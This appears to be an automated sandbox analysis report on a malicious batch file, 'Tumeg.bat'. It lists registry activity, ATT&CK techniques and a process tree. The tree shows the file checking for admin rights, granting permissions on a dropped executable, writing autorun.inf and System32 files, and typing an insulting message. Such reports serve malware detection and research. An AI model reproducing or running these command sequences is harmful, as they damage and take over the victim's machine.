Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{B943CCCB-81A1-470E-8E6B-D3DD8AE4257B}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "823"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "856"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "823"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "856"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "823"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{9CC36C91-DC31-4CAC-A118-2FACE1F182E5}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{77596BDE-2886-4636-8A28-8CB1447349C0}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "823"	SearchApp.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3456	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3804	PING.EXE
1448	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4136	msedge.exe
4136	msedge.exe
4580	msedge.exe
4580	msedge.exe
6052	WMIC.exe
6052	WMIC.exe
6052	WMIC.exe
6052	WMIC.exe
1400	identity_helper.exe
1400	identity_helper.exe
6452	msedge.exe
6452	msedge.exe
6452	msedge.exe
6452	msedge.exe
4528	msedge.exe
4528	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5580	explorer.exe
5860	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs

pid	Process
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	2964	taskkill.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: 33	2508	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2508	AUDIODG.EXE
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe
Token: SeShutdownPrivilege	4804	explorer.exe
Token: SeCreatePagefilePrivilege	4804	explorer.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
4580	msedge.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
5068	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
4804	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5788	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe
5392	explorer.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
1952	StartMenuExperienceHost.exe
3644	TextInputHost.exe
3644	TextInputHost.exe
1460	StartMenuExperienceHost.exe
3792	SearchApp.exe
5856	TextInputHost.exe
5856	TextInputHost.exe
5976	TextInputHost.exe
6056	StartMenuExperienceHost.exe
5976	TextInputHost.exe
5440	StartMenuExperienceHost.exe
3760	SearchApp.exe
4204	TextInputHost.exe
4204	TextInputHost.exe
3272	StartMenuExperienceHost.exe
5780	SearchApp.exe
5580	explorer.exe
6712	TextInputHost.exe
6712	TextInputHost.exe
6516	StartMenuExperienceHost.exe
4468	SearchApp.exe
2396	TextInputHost.exe
2396	TextInputHost.exe
5580	StartMenuExperienceHost.exe
5596	SearchApp.exe
2180	TextInputHost.exe
2180	TextInputHost.exe
6308	StartMenuExperienceHost.exe
5468	SearchApp.exe
5860	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4028 wrote to memory of 2712	4028	cmd.exe	82
PID 4028 wrote to memory of 2712	4028	cmd.exe	82
PID 2712 wrote to memory of 3732	2712	net.exe	83
PID 2712 wrote to memory of 3732	2712	net.exe	83
PID 4028 wrote to memory of 520	4028	cmd.exe	84
PID 4028 wrote to memory of 520	4028	cmd.exe	84
PID 1396 wrote to memory of 4728	1396	cmd.exe	105
PID 1396 wrote to memory of 4728	1396	cmd.exe	105
PID 4728 wrote to memory of 1308	4728	net.exe	106
PID 4728 wrote to memory of 1308	4728	net.exe	106
PID 1396 wrote to memory of 4632	1396	cmd.exe	107
PID 1396 wrote to memory of 4632	1396	cmd.exe	107
PID 1396 wrote to memory of 2728	1396	cmd.exe	108
PID 1396 wrote to memory of 2728	1396	cmd.exe	108
PID 1396 wrote to memory of 4400	1396	cmd.exe	109
PID 1396 wrote to memory of 4400	1396	cmd.exe	109
PID 1396 wrote to memory of 3184	1396	cmd.exe	110
PID 1396 wrote to memory of 3184	1396	cmd.exe	110
PID 1396 wrote to memory of 1448	1396	cmd.exe	111
PID 1396 wrote to memory of 1448	1396	cmd.exe	111
PID 1396 wrote to memory of 64	1396	cmd.exe	112
PID 1396 wrote to memory of 64	1396	cmd.exe	112
PID 1396 wrote to memory of 976	1396	cmd.exe	113
PID 1396 wrote to memory of 976	1396	cmd.exe	113
PID 1396 wrote to memory of 4276	1396	cmd.exe	114
PID 1396 wrote to memory of 4276	1396	cmd.exe	114
PID 1396 wrote to memory of 228	1396	cmd.exe	115
PID 1396 wrote to memory of 228	1396	cmd.exe	115
PID 1396 wrote to memory of 4512	1396	cmd.exe	116
PID 1396 wrote to memory of 4512	1396	cmd.exe	116
PID 1396 wrote to memory of 1340	1396	cmd.exe	117
PID 1396 wrote to memory of 1340	1396	cmd.exe	117
PID 1396 wrote to memory of 3104	1396	cmd.exe	118
PID 1396 wrote to memory of 3104	1396	cmd.exe	118
PID 1396 wrote to memory of 3864	1396	cmd.exe	119
PID 1396 wrote to memory of 3864	1396	cmd.exe	119
PID 1396 wrote to memory of 192	1396	cmd.exe	120
PID 1396 wrote to memory of 192	1396	cmd.exe	120
PID 1396 wrote to memory of 4524	1396	cmd.exe	121
PID 1396 wrote to memory of 4524	1396	cmd.exe	121
PID 1396 wrote to memory of 664	1396	cmd.exe	122
PID 1396 wrote to memory of 664	1396	cmd.exe	122
PID 1396 wrote to memory of 4972	1396	cmd.exe	123
PID 1396 wrote to memory of 4972	1396	cmd.exe	123
PID 1396 wrote to memory of 1776	1396	cmd.exe	124
PID 1396 wrote to memory of 1776	1396	cmd.exe	124
PID 1396 wrote to memory of 628	1396	cmd.exe	125
PID 1396 wrote to memory of 628	1396	cmd.exe	125
PID 1396 wrote to memory of 4992	1396	cmd.exe	126
PID 1396 wrote to memory of 4992	1396	cmd.exe	126
PID 1396 wrote to memory of 4764	1396	cmd.exe	127
PID 1396 wrote to memory of 4764	1396	cmd.exe	127
PID 1396 wrote to memory of 2388	1396	cmd.exe	128
PID 1396 wrote to memory of 2388	1396	cmd.exe	128
PID 1396 wrote to memory of 3228	1396	cmd.exe	129
PID 1396 wrote to memory of 3228	1396	cmd.exe	129
PID 1396 wrote to memory of 3636	1396	cmd.exe	130
PID 1396 wrote to memory of 3636	1396	cmd.exe	130
PID 1396 wrote to memory of 4604	1396	cmd.exe	131
PID 1396 wrote to memory of 4604	1396	cmd.exe	131
PID 1396 wrote to memory of 1772	1396	cmd.exe	132
PID 1396 wrote to memory of 1772	1396	cmd.exe	132
PID 1396 wrote to memory of 224	1396	cmd.exe	133
PID 1396 wrote to memory of 224	1396	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5736	attrib.exe
5780	attrib.exe
332	attrib.exe
6052	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Tumeg.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3732
- C:\Windows\system32\choice.exe
  choice /c YN /n /m ""
  2⤵
  PID:520

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2312

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tumeg.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:3456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Tumeg.bat"
1⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1396
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1308
- C:\Windows\system32\choice.exe
  choice /c YN /n /m ""
  2⤵
  PID:4632
- C:\Windows\system32\icacls.exe
  icacls "C:\ProgramData\Tumeg.exe" /grant Administrators:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2728
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Notepad" /v iPointSize /t REG_DWORD /d 36 /f
  2⤵
  PID:4400
- C:\Windows\system32\notepad.exe
  notepad
  2⤵
  PID:3184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 2
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1448
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "Y"
  2⤵
  PID:64
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:976
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:4276
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:228
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:4512
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "P"
  2⤵
  PID:1340
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "C"
  2⤵
  PID:3104
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3864
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "i"
  2⤵
  PID:192
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "s"
  2⤵
  PID:4524
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:664
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "f"
  2⤵
  PID:4972
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:1776
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:628
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "k"
  2⤵
  PID:4992
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:4764
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "d"
  2⤵
  PID:2388
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3228
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "b"
  2⤵
  PID:3636
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:4604
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:1772
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "T"
  2⤵
  PID:224
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:2736
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:2836
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:2952
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "g"
  2⤵
  PID:2424
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:1764
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:816
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "R"
  2⤵
  PID:1348
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:2280
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:700
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:2484
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:3716
